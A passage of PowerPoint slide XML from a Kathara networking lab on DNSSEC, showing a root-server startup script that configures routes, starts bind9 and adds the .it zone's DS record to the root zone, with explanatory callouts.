                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 10.0.3.5/24 dev eth0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 110.0.0.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 210.0.3.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 100.0.75.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 200.1.1.0/24 via 10.0.3.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 195.0.10.0/24 via 10.0.3.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/cache/bind/keys</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 775 /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> start bind9</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  while ! dig @10.0.3.10 it DNSKEY | grep -q "257 3 13"; do sleep 2; done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  echo "" &gt;&gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  dig @10.0.3.10 it DNSKEY | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec-dsfromkey</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -f - it &gt;&gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  sed -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 's/2024120401/2024120402/' /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reload .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &amp;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5949289-319D-73A1-E3D9-47E44441F654}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2705" cy="143"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot.startup</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EA46AAC-B38B-7039-4C17-ABE31B6389B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7325716E-BB5C-85A2-4B6B-65E7E7744B70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E7B623-7E6E-70D9-90AA-743579289578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38AAC33C-C003-4AF0-F7BE-E7941EE9B3E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6787823" y="2306057"/>
            <a:ext cx="4981597" cy="1560120"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -19186"/>
              <a:gd name="adj2" fmla="val 133790"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Downloads the .it public key (DNSKEY).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Passes it to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dnssec-dsfromkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> command, which calculates the key's hash and generates the DS (Delegation Signer) record.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adds this DS record to the root file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>db.root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A2A3B1D-FD44-A2C2-33B3-D9517B29D19D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7550354" y="5847322"/>
            <a:ext cx="3830316" cy="627396"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -58873"/>
              <a:gd name="adj2" fmla="val -88320"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>searches the file for the serial string and increments it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202122792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6B511E-199F-D63B-3D22-0597D3685232}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A4B2BFD-2C82-E66E-5F16-F73F85CB8A81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="2033534"/>
            <a:ext cx="7641005" cy="2790932"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5E662C-3F13-BB33-6AC2-938EAF114906}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="831"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
